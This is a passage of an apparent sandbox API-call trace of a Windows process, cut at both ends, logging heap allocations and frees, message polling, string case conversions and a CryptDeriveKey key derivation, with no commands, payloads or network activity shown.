returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0257.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x34aa838, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0257.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.762] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0257.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0257.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0257.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0257.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.763] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0257.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0257.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0257.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.766] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0257.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0257.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.775] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0257.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0257.775] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0257.776] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0257.776] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0257.776] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.777] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.777] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.777] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0257.778] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.778] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.778] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.779] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.779] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.779] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.779] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.779] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.780] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0257.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0257.780] 